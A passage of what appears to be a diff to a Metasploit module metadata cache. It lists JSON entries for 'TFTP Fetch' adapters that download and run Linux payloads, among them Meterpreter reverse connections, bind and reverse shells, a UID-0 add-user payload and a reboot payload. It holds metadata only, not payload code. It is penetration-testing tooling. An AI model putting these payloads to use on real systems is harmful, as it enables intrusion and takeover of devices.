false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/aarch64", + "adapted_refname": "linux/aarch64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/armbe/meterpreter_reverse_http": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/armbe/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMBE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armbe/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armbe", + "adapted_refname": "linux/armbe/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/tftp/armbe/meterpreter_reverse_https": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/armbe/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMBE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armbe/meterpreter_reverse_https", + "check": 
false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armbe", + "adapted_refname": "linux/armbe/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/tftp/armbe/meterpreter_reverse_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/armbe/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMBE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armbe/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armbe", + "adapted_refname": "linux/armbe/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/armbe/shell_bind_tcp": { + "name": "TFTP Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/tftp/armbe/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Balazs Bucsay @xoreipeip " + ], + "description": "Fetch and execute an ARMBE payload from a TFTP server.\nListen for a connection and spawn a command shell", + "references": [ + "URL-https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + 
"autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armbe/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armbe", + "adapted_refname": "linux/armbe/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/armle/adduser": { + "name": "TFTP Fetch, Linux Add User", + "fullname": "payload/cmd/linux/tftp/armle/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Jonathan Salwan" + ], + "description": "Fetch and execute an ARMLE payload from a TFTP server.\nCreate a new user with UID 0", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armle/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armle", + "adapted_refname": "linux/armle/adduser", + "staged": false + }, + "payload_cmd/linux/tftp/armle/exec": { + "name": "TFTP Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/tftp/armle/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Jonathan Salwan" + ], + "description": "Fetch and execute an ARMLE payload from a TFTP server.\nExecute an arbitrary command", + "references": [], + "platform": "Linux", 
+ "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armle/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armle", + "adapted_refname": "linux/armle/exec", + "staged": false + }, + "payload_cmd/linux/tftp/armle/meterpreter/bind_tcp": { + "name": "TFTP Fetch, Bind TCP Stager", + "fullname": "payload/cmd/linux/tftp/armle/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "nemo " + ], + "description": "Fetch and execute an ARMLE payload from a TFTP server.\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armle/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armle", + "adapted_refname": "linux/armle/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "linux/armle/meterpreter", + "stager_refname": "linux/armle/bind_tcp" + }, + "payload_cmd/linux/tftp/armle/meterpreter/reverse_tcp": { + "name": "TFTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/armle/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan 
Watters", + "Spencer McIntyre", + "Adam Cammack ", + "nemo ", + "tkmru" + ], + "description": "Fetch and execute an ARMLE payload from a TFTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armle/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armle", + "adapted_refname": "linux/armle/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/armle/meterpreter", + "stager_refname": "linux/armle/reverse_tcp" + }, + "payload_cmd/linux/tftp/armle/meterpreter_reverse_http": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/armle/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMLE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armle/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armle", + "adapted_refname": "linux/armle/meterpreter_reverse_http", + "staged": false + }, + 
"payload_cmd/linux/tftp/armle/meterpreter_reverse_https": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/armle/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMLE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armle/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armle", + "adapted_refname": "linux/armle/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/tftp/armle/meterpreter_reverse_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/armle/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMLE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armle/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + 
"adapter_refname": "cmd/linux/tftp/armle", + "adapted_refname": "linux/armle/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/armle/shell/bind_tcp": { + "name": "TFTP Fetch, Linux dup2 Command Shell, Bind TCP Stager", + "fullname": "payload/cmd/linux/tftp/armle/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "nemo " + ], + "description": "Fetch and execute an ARMLE payload from a TFTP server.\ndup2 socket in r12, then execve.\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armle/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armle", + "adapted_refname": "linux/armle/shell/bind_tcp", + "staged": true, + "stage_refname": "linux/armle/shell", + "stager_refname": "linux/armle/bind_tcp" + }, + "payload_cmd/linux/tftp/armle/shell/reverse_tcp": { + "name": "TFTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/armle/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "nemo ", + "tkmru" + ], + "description": "Fetch and execute an ARMLE payload from a TFTP server.\ndup2 socket in r12, then execve.\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": 
"/modules/payloads/adapters/cmd/linux/tftp/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armle/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armle", + "adapted_refname": "linux/armle/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/armle/shell", + "stager_refname": "linux/armle/reverse_tcp" + }, + "payload_cmd/linux/tftp/armle/shell_bind_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/tftp/armle/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "civ", + "hal" + ], + "description": "Fetch and execute an ARMLE payload from a TFTP server.\nConnect to target and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armle/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armle", + "adapted_refname": "linux/armle/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/armle/shell_reverse_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/tftp/armle/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "civ" + ], + "description": "Fetch and execute an ARMLE payload from a TFTP server.\nConnect back 
to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armle/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armle", + "adapted_refname": "linux/armle/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/mips64/meterpreter_reverse_http": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/mips64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a MIPS64 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 13:20:59 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mips64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mips64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mips64", + "adapted_refname": "linux/mips64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/tftp/mips64/meterpreter_reverse_https": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/mips64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan 
Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a MIPS64 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 13:20:59 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mips64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mips64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mips64", + "adapted_refname": "linux/mips64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/tftp/mips64/meterpreter_reverse_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/mips64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a MIPS64 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 13:20:59 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mips64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mips64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mips64", + "adapted_refname": "linux/mips64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/mipsbe/exec": { + "name": "TFTP Fetch, Linux Execute Command", + "fullname": 
"payload/cmd/linux/tftp/mipsbe/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "entropy " + ], + "description": "Fetch and execute an MIPSBE payload from a TFTP server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes.", + "references": [ + "EDB-17940" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsbe/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsbe", + "adapted_refname": "linux/mipsbe/exec", + "staged": false + }, + "payload_cmd/linux/tftp/mipsbe/meterpreter/reverse_tcp": { + "name": "TFTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/mipsbe/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "juan vazquez ", + "tkmru" + ], + "description": "Fetch and execute an MIPSBE payload from a TFTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsbe/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + 
"payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsbe/meterpreter", + "stager_refname": "linux/mipsbe/reverse_tcp" + }, + "payload_cmd/linux/tftp/mipsbe/meterpreter_reverse_http": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSBE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsbe/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/tftp/mipsbe/meterpreter_reverse_https": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSBE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", + 
"is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsbe/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/tftp/mipsbe/meterpreter_reverse_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSBE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsbe/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/mipsbe/reboot": { + "name": "TFTP Fetch, Linux Reboot", + "fullname": "payload/cmd/linux/tftp/mipsbe/reboot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "rigan - " + ], + "description": "Fetch and execute an MIPSBE payload from a TFTP server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes or executing\n other payloads that rely on initial startup 
procedures.", + "references": [ + "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsbe/reboot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsbe", + "adapted_refname": "linux/mipsbe/reboot", + "staged": false + }, + "payload_cmd/linux/tftp/mipsbe/shell/reverse_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/mipsbe/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "juan vazquez ", + "tkmru" + ], + "description": "Fetch and execute an MIPSBE payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsbe/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsbe", + "adapted_refname": "linux/mipsbe/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsbe/shell", + "stager_refname": "linux/mipsbe/reverse_tcp" + }, + "payload_cmd/linux/tftp/mipsbe/shell_bind_tcp": { + "name": "TFTP Fetch, Linux Command 
Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/tftp/mipsbe/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "scut", + "vaicebine", + "Vlatko Kosturjak", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSBE payload from a TFTP server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsbe/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsbe", + "adapted_refname": "linux/mipsbe/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/mipsbe/shell_reverse_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/tftp/mipsbe/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "rigan ", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSBE payload from a TFTP server.\nConnect back to attacker and spawn a command shell", + "references": [ + "EDB-18226" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsbe/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": 
false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsbe", + "adapted_refname": "linux/mipsbe/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/mipsle/exec": { + "name": "TFTP Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/tftp/mipsle/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "entropy " + ], + "description": "Fetch and execute an MIPSLE payload from a TFTP server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes as well as\n on targets with extremely limited buffer space.", + "references": [ + "EDB-17940" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsle/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsle", + "adapted_refname": "linux/mipsle/exec", + "staged": false + }, + "payload_cmd/linux/tftp/mipsle/meterpreter/reverse_tcp": { + "name": "TFTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/mipsle/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "juan vazquez 